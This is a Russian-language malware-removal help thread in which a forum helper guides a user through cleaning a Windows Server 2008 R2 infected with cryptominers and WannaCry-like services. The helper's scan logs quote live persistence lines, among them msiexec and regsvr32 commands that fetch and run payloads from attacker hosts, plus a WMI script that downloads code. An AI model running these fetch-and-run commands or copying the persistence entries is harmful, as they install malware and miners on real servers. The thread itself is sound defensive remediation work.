Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 26.

Обнаружена критическая неполадка [UDS:DangerousObject.Multi.Generic] (заявка № 222367)

  1. #1
    Junior Member Репутация
    Регистрация
    27.06.2013
    Сообщений
    21
    Вес репутации
    40

    Обнаружена критическая неполадка [UDS:DangerousObject.Multi.Generic]

    Появилась ошибка (возникает каждый раз при загрузке системы, но может появится и через некоторое время работы) windows server 2008 r2, "Обнаружена критическая неполадка, система будет автоматически перезагружена через одну минуту. Сохраните работу сейчас". Для начала лечил с загрузочного диска Dr.Web CureIt, но после лечения примерно через сутки, ошибка вернулась и система перезагрузилась. Далее в ход пошли загрузочные диски Касперского и NOD, но проблема осталась, хотя в данный момент все работает, но на долго ли. Буду признателен в помощи решения данной проблемы.

    Забыл добавить.
    В журнале windows, есть ошибка в журнале приложений "Критический системный процесс C:\Windows\system32\lsm.exe завершился ошибкой с кодом состояния 1. Система будет перезагружена". Делал sfc /scannow и получал ошибку "Защита ресурсов Windows не может выполнить запрошенную операцию.". После зашел в безопасный режим без загрузки сети и выполнил sfc /scannow при этом предупреждения с перезагрузкой системы не было, скан выполнился и ошибок не было. Загрузился с поддержкой сети и получал предупреждение о том, что система будет перезагружена.
    Вложения Вложения
    Последний раз редактировалось terehovskiy; 26.03.2019 в 00:19.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) terehovskiy, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,462
    Вес репутации
    1058
    Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)пофиксите только эти строки:
    Код:
    F2 - HKCU\..\WinLogon: [Shell] = explorer.exe, C:\Users\Администратор\AppData\Roaming\dhelper.exe
    F2 - HKU\.DEFAULT\..\WinLogon: [Shell] = explorer.exe, C:\Windows\system32\config\systemprofile\AppData\Roaming\dhelper.exe
    O4 - HKLM\..\Run: [start1] = C:\Windows\system32\msiexec.exe /i http://js.5b6b7b.ru:280/helloworld.msi /q
    O4 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.5b6b7b.ru:280/v.sct scrobj.dll
    O4 - MSConfig\startupfolder: C:^Users^Администратор^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^explorer.lnk [backup] => C:\Users\Администратор\AppData\Roaming\TempoR\DOC001.exe (2019/03/24)
    O4 - User Startup: C:\Users\Администратор\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\explorer.lnk    ->    C:\Users\Администратор\AppData\Roaming\TempoR\DOC001.exe
    O7 - IPSec: Name: win (2018/02/02) - {c7419a5a-181a-4fcd-a459-f29ae47ba99e} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/02) - {c7419a5a-181a-4fcd-a459-f29ae47ba99e} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/02) - {c7419a5a-181a-4fcd-a459-f29ae47ba99e} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/02) - {c7419a5a-181a-4fcd-a459-f29ae47ba99e} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
    O7 - IPSec: Name: win (2018/02/02) - {c7419a5a-181a-4fcd-a459-f29ae47ba99e} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
    O22 - Task: Microsoft LocalManager[Windows Server 2008 R2 Enterprise] - C:\ProgramData\{88748799-8874-8874-887487997161}\lsm.exe
    O23 - Service S2: Microsoft Security Center (2.0) Service - (mssecsvc2.0) - C:\WINDOWS\mssecsvc.exe -m security (file missing)
    O23 - Service S2: Microsoft Security Center (2.1) Service - (mssecsvc2.1) - C:\WINDOWS\mssecsvr.exe -m security (file missing)
    O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.my0115.ru:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for(1724 bytes)
    Выполните скрипт в AVZ:
    Код:
    begin
     TerminateProcessByName('c:\users\836d~1\appdata\local\temp\2\buff2.exe');
     TerminateProcessByName('c:\users\Администратор\appdata\roaming\dhelper.exe');
     TerminateProcessByName('c:\users\Администратор\appdata\roaming\tempor\doc001.exe');
     TerminateProcessByName('C:\Users\Администратор\AppData\Roaming\TempoR\NsCpuCNMiner64.exe');
     QuarantineFile('C:\ProgramData\{88748799-8874-8874-887487997161}\lsm.exe', '');
     QuarantineFile('c:\users\836d~1\appdata\local\temp\2\buff2.exe', '');
     QuarantineFile('C:\Users\836D~1\AppData\Roaming\TempoR\DOC001.exe', '');
     QuarantineFile('c:\users\Администратор\appdata\roaming\dhelper.exe', '');
     QuarantineFile('c:\users\Администратор\appdata\roaming\tempor\doc001.exe', '');
     QuarantineFile('C:\Users\Администратор\AppData\Roaming\TempoR\NsCpuCNMiner64.exe', '');
     QuarantineFile('C:\WINDOWS\mssecsvc.exe', '');
     QuarantineFile('C:\Windows\system32\config\systemprofile\AppData\Roaming\dhelper.exe', '');
     QuarantineFileF('c:\programdata\{88748799-8874-8874-887487997161}', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
     DeleteFile('C:\ProgramData\{88748799-8874-8874-887487997161}\lsm.exe', '64');
     DeleteFile('c:\users\836d~1\appdata\local\temp\2\buff2.exe', '');
     DeleteFile('c:\users\836d~1\appdata\local\temp\2\buff2.exe', '64');
     DeleteFile('C:\Users\836D~1\AppData\Roaming\TempoR\DOC001.exe', '64');
     DeleteFile('c:\users\Администратор\appdata\roaming\dhelper.exe', '');
     DeleteFile('C:\Users\Администратор\AppData\Roaming\dhelper.exe', '32');
     DeleteFile('C:\Users\Администратор\AppData\Roaming\dhelper.exe', '64');
     DeleteFile('c:\users\Администратор\appdata\roaming\tempor\doc001.exe', '');
     DeleteFile('C:\Users\Администратор\AppData\Roaming\TempoR\DOC001.exe', '64');
     DeleteFile('C:\Users\Администратор\AppData\Roaming\TempoR\NsCpuCNMiner64.exe', '');
     DeleteFile('C:\Users\Администратор\AppData\Roaming\TempoR\NsCpuCNMiner64.exe', '64');
     DeleteFile('C:\WINDOWS\mssecsvc.exe', '64');
     DeleteFile('C:\Windows\system32\config\systemprofile\AppData\Roaming\dhelper.exe', '32');
     DeleteFile('C:\Windows\system32\config\systemprofile\AppData\Roaming\dhelper.exe', '64');
     DeleteService('mssecsvc2.0');
     DeleteFileMask('c:\programdata\{88748799-8874-8874-887487997161}', '*', true);
     DeleteFileMask('c:\users\администратор\appdata\roaming\tempor', '*', true);
     DeleteDirectory('c:\programdata\{88748799-8874-8874-887487997161}');
     DeleteDirectory('c:\users\администратор\appdata\roaming\tempor');
     RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder\C:^Users^Администратор^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^explorer.lnk', 'command', '64');
     RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', '64');
     RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start1', '64');
     DeleteSchedulerTask('Microsoft LocalManager[Windows Server 2008 R2 Enterprise]');
     CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
    ExecuteSysClean;
     ExecuteWizard('SCU', 3, 3, true);
    end.
    Перезагрузите компьютер вручную.

    В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    27.06.2013
    Сообщений
    21
    Вес репутации
    40
    Карантин закачал, отчет Farbat прикреплен к сообщению.
    Вложения Вложения

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,462
    Вес репутации
    1058
    Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
    Код:
    HKU\S-1-5-21-2162965194-4131769982-3901334038-500\...\Run: [] => [X]
    2019-03-26 05:29 - 2019-03-25 16:24 - 001815801 _____ C:\DOC001.exe
    Folder: C:\ProgramData\{79763631-7976-7976-797636311134}
    Folder: C:\Adobe
    CMD: Type C:\Users\Администратор\AppData\Roaming\temp.bat
    CMD: Type C:\Users\Администратор\AppData\Roaming\offline.txt
    2019-03-26 05:29 - 2019-03-26 05:29 - 000000000 __SHD C:\ProgramData\{79763631-7976-7976-797636311134}
    2019-03-26 04:49 - 2019-03-26 11:05 - 000000000 __SHD C:\ProgramData\{71338236-7133-7133-713382363282}
    2019-03-26 04:48 - 2019-03-26 04:48 - 000000000 __SHD C:\ProgramData\{49266261-4926-4926-492662617672}
    2019-03-26 02:24 - 2019-03-26 02:24 - 000000000 __SHD C:\ProgramData\{46500021-4650-4650-465000213155}
    2019-03-25 20:25 - 2019-03-25 20:25 - 000000000 __SHD C:\ProgramData\{98921577-9892-9892-989215774874}
    2019-03-25 20:20 - 2019-03-25 20:20 - 000000000 __SHD C:\ProgramData\{66815628-6681-6681-668156281152}
    2019-03-25 18:37 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{59138615-5913-5913-591386157295}
    2019-03-25 18:37 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{40865857-4086-4086-408658571581}
    2019-03-25 16:40 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{98496839-9849-9849-984968399042}
    2019-03-25 16:24 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{90746615-9074-9074-907466156846}
    2019-03-25 16:24 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{79172239-7917-7917-791722399387}
    2019-03-25 15:15 - 2019-03-25 22:09 - 000000000 __SHD C:\ProgramData\{16615732-1661-1661-166157328531}
    2019-03-09 07:23 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{22312142-2231-2231-223121427199}
    2019-03-09 04:23 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{94501177-9450-9450-945011774394}
    2019-03-09 04:22 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{61873280-6187-6187-618732807155}
    2019-03-09 04:19 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{30504801-3050-3050-305048017986}
    2019-03-09 04:19 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{22067586-2206-2206-220675864869}
    2019-02-26 05:58 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{38040600-3804-3804-380406004380}
    2019-02-26 03:04 - 2019-03-26 00:04 - 000000026 _____ C:\Users\Администратор\AppData\Roaming\temp.bat
    2019-02-26 02:56 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{10205068-1020-1020-102050689947}
    2019-02-26 02:54 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{88314851-8831-8831-883148514966}
    2019-02-25 17:21 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{69857680-6985-6985-698576801056}
    2019-02-25 14:17 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{74130130-7413-7413-741301309946}
    2019-02-25 14:17 - 2019-03-24 21:06 - 000000000 ____D C:\Users\Администратор\AppData\Roaming\Tempo
    2019-02-25 14:17 - 2017-06-04 20:01 - 000000000 __RSH C:\Users\Администратор\AppData\Roaming\cppredistx86.exe
    2019-02-25 12:33 - 2019-03-24 21:06 - 000000000 __SHD C:\ProgramData\{79009396-7900-7900-790093963383}
    2018-03-17 01:49 - 2019-03-24 04:55 - 000000087 _____ () C:\Program Files\Common Files\xp.dat
    2018-09-13 12:32 - 2018-09-27 01:15 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
    Task: {0CD94DF2-AF93-481C-8C15-62308D50B606} - \Mysa2 -> No File <==== ATTENTION
    Task: {16920345-F4E4-4BF7-A7A4-003FADF2FA1F} - \Mysa1 -> No File <==== ATTENTION
    Task: {35BE678B-CAD4-4E8E-A9E6-7F5FC70478BD} - \ok -> No File <==== ATTENTION
    Task: {5AC0E213-52C3-4D11-AB18-58470AFB0DF9} - \Mysa3 -> No File <==== ATTENTION
    Task: {6CC622DF-AB17-47A7-A8C8-6E235D03B902} - \Mysa -> No File <==== ATTENTION
    Reboot:
    и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
    Закройте все программы, отключите пользователей, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    Перезагрузите сервер.

    Скорее всего зловреды лезут через незакрытую уязвимость.

    Выполните скрипт в AVZ при наличии доступа в интернет:
    Код:
    var
    LogPath : string;
    ScriptPath : string;
    
    begin
     LogPath := GetAVZDirectory + 'log\avz_log.txt';
     if FileExists(LogPath) Then DeleteFile(LogPath);
     ScriptPath := GetAVZDirectory +'ScanVuln.txt';
    
      if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
        if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
           ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
           exit;
          end;
      end;
     if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
    end.
    После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt
    WBR,
    Vadim

  7. #6
    Junior Member Репутация
    Регистрация
    27.06.2013
    Сообщений
    21
    Вес репутации
    40
    Fixlog прикрепил. Найдено 5 уязвимостей после выполнения скрипта. Их установить как я понял? Кстати появился еще один пользователь при входе admin$.
    Вложения Вложения

  8. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,462
    Вес репутации
    1058
    Устраняйте обязательно, долбят наверняка через закрытую ещё в апреле 2017-го года уязвимость.
    Удаляйте лишних пользователей, меняйте пароли.
    WBR,
    Vadim

  9. #8
    Junior Member Репутация
    Регистрация
    27.06.2013
    Сообщений
    21
    Вес репутации
    40
    Какие дальше мои действия? Обновления установил. Пользователя удалил. Доступ к рдп ограничен по ИП через брендмауэр.

  10. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,462
    Вес репутации
    1058
    Понаблюдайте день хотя бы, если рецидива не будет - всё в порядке.
    WBR,
    Vadim

  11. #10
    Junior Member Репутация
    Регистрация
    27.06.2013
    Сообщений
    21
    Вес репутации
    40
    Пока предыдущая проблема не возникала, но появились новые. Увидел, что в брендмауэре создается правило "tcp all" которое открывает все действующие порты, если его удалить, оно снова появляется.
    Также стала падать служба mssql сервер 2008 с логом 7034, полагаю это из-за вируса, т.к. роняет ее "Microsoft Security Center (2.1) Service". При этом в логах есть запись "Сбой при запуске службы "Microsoft Security Center (2.1) Service" из-за ошибки. Не удается найти указанный файл.". Службу отключал, но mssql сервер все равно падает. Думал, что проблема в самом sql из-за обновления винды, но в итоге пришел к тому, что у меня последний пакет обновлений для mssql сервер. Хочется окончательно избавится от вирусов.

    - - - - -Добавлено - - - - -

    Сейчас заметил, что он пытается запустить 2 службы MSC, "Сбой при запуске службы "Microsoft Security Center (2.0) Service" из-за ошибки. Не удается найти указанный файл." и такую же службу версии 2.1. Хотя по сути, служба запущена и ее видно в службах.
    Последний раз редактировалось terehovskiy; 27.03.2019 в 19:38.

  12. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,462
    Вес репутации
    1058
    Левые задания в MS SQL Server есть?

    Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.
    WBR,
    Vadim

  13. #12
    Junior Member Репутация
    Регистрация
    27.06.2013
    Сообщений
    21
    Вес репутации
    40
    Файл прикрепил. Кстати, я совсем забыл сказать, что стоит программный рейд диска C. Возможно вирусы лезут со второго диска?
    Вложения Вложения
    Последний раз редактировалось terehovskiy; 28.03.2019 в 16:58.

  14. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,462
    Вес репутации
    1058
    Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):
    Код:
    ;uVS v4.1.3 [http://dsrt.dyndns.org]
    ;Target OS: NTv6.1
    v400c
    OFFSGNSAVE
    delref %Sys32%\DRIVERS\18D89FC586.SYS
    delref HTTP://JS.1226BYE.XYZ:280/V.SCT
    zoo %SystemRoot%\SYSTEM\MSINFO.EXE
    addsgn 9A79B350438226EC0AD4EC449312FB4DA34303A78661DA9170F7C2BC632486890949A66505AA1CAFD480849FB3EFC2CEC87B13B65522D617E8B64E2746FA8C56 8 Win32/Agent.WTF [ESET-NOD32] 7
    
    chklst
    delvir
    
    deltsk %SystemRoot%\SYSTEM\MY1.BAT
    delref %SystemDrive%\USERS\АДМИНИСТРАТОР\APPDATA\LOCAL\GOOGLE\UPDATE\1.3.33.23\GOOGLEUPDATEONDEMAND.EXE
    regt 25
    apply
    
    deltmp
    czoo
    Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
    Перезагрузите сервер.

    В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

    В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

    Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

    Нажмите кнопку Scan.
    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  15. #14
    Junior Member Репутация
    Регистрация
    27.06.2013
    Сообщений
    21
    Вес репутации
    40
    Архив загрузил, логи во вложении.
    Вложения Вложения

  16. #15
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,462
    Вес репутации
    1058
    Уязвимости точно все устранили? Свежие майнеры и трояны снова.

    Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:
    Код:
    HKLM-x32\...\Run: [] => [X]
    S2 mssecsvc2.0; C:\WINDOWS\mssecsvc.exe -m security [X]
    S2 mssecsvc2.1; C:\WINDOWS\mssecsvr.exe -m security [X]
    Virustotal: C:\Windows\SysWOW64\csrs.exe
    2019-03-28 22:24 - 2019-03-28 22:24 - 006466961 _____ (Microsoft Corporation) C:\Windows\SysWOW64\csrs.exe
    Folder: C:\Windows\CheckSur
    Folder: C:\Program Files\shengda
    Folder: C:\Program Files\kugou2010
    C:\Windows\SysWOW64\*.dmp
    2019-03-26 19:25 - 2019-03-28 16:24 - 000000084 _____ C:\Program Files\Common Files\xpwpd.dat
    2019-03-26 19:25 - 2019-03-28 16:18 - 000023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Drivers\64.exe
    2019-03-26 19:25 - 2019-03-28 16:17 - 000023552 _____ (Microsoft Corporation) C:\Windows\system\down.exe
    2019-03-26 19:25 - 2019-03-28 16:16 - 000008702 _____ C:\Windows\system32\c.txt
    2019-03-26 22:26 - 2019-03-28 07:13 - 000000080 _____ C:\Windows\system32\s
    2019-03-26 22:26 - 2019-03-28 07:13 - 000000078 _____ C:\Windows\system32\ps
    2019-03-26 22:26 - 2019-03-28 07:13 - 000000076 _____ C:\Windows\system32\p
    2019-03-26 19:25 - 2019-03-26 19:25 - 000000000 __SHD C:\Program Files\shengda
    2019-03-26 19:25 - 2019-03-26 19:25 - 000000000 __SHD C:\Program Files\kugou2010
    2019-03-26 19:24 - 2019-03-28 16:15 - 000000084 _____ C:\Program Files\Common Files\xpdown.dat
    2019-03-26 14:21 - 2018-02-02 12:16 - 584878796 _____ C:\Windows\MEMORY.DMP
    2019-03-26 04:49 - 2019-02-25 14:17 - 000002400 _____ C:\Users\Администратор\AppData\Roaming\offline.txt
    Task: {64FBD7D5-8E3C-4535-80B4-1322EFC6CC91} - \ok -> No File <==== ATTENTION
    Task: {E3154922-CE27-4925-A98A-D95128C3C300} - \Mysa1 -> No File <==== ATTENTION
    FirewallRules: [{F9483CF5-FDA9-46B6-8538-3B01B071C81B}] => (Block) LPort=445
    FirewallRules: [{64923BA9-1871-4C1B-8078-7C3D06494DC7}] => (Block) LPort=139
    и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
    Отключите до перезагрузки всех пользователей, закройте все программы, запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
    WBR,
    Vadim

  17. #16
    Junior Member Репутация
    Регистрация
    27.06.2013
    Сообщений
    21
    Вес репутации
    40
    Да, уязвимости устранил. Перепроверял после установки заплаток.
    Вложения Вложения

  18. #17
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,462
    Вес репутации
    1058
    Похоже, источник заражения на одном из компьютеров в сети.

    Сделайте лог сканирования Мalwarebytes.
    WBR,
    Vadim

  19. #18
    Junior Member Репутация
    Регистрация
    27.06.2013
    Сообщений
    21
    Вес репутации
    40
    Зная нашего брата, вероятность того, что в сети есть такой компьютер 99%.
    Вложения Вложения

  20. #19
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    35,462
    Вес репутации
    1058
    Поправьте настройки DNS: 223.5.5.5 - 8.8.8.8
    Первый замените на провайдерский или 8.8.4.4.

    Проверьте сеть через ETERNAL BLUES, уязвимые компьютеры проверяйте в первую очередь.
    WBR,
    Vadim

  21. #20
    Junior Member Репутация
    Регистрация
    27.06.2013
    Сообщений
    21
    Вес репутации
    40
    Этот софт ищет компьютеры с уязвимостями в сети? Сеть ДЦ. Есть смысл мне или нет?

  • Уважаемый(ая) terehovskiy, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Страница 1 из 2 12 Последняя

    Похожие темы

    1. Обнаружена критическая неполадка
      От berzik5 в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 18.06.2018, 23:12
    2. Ответов: 2
      Последнее сообщение: 14.12.2017, 13:24
    3. Обнаружена критическая неполадка windows 7-64
      От Vadsi1121 в разделе Помогите!
      Ответов: 2
      Последнее сообщение: 02.10.2015, 07:02
    4. Ответов: 2
      Последнее сообщение: 08.08.2014, 14:25
    5. Ответов: 4
      Последнее сообщение: 29.12.2012, 15:28

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01052 seconds with 18 queries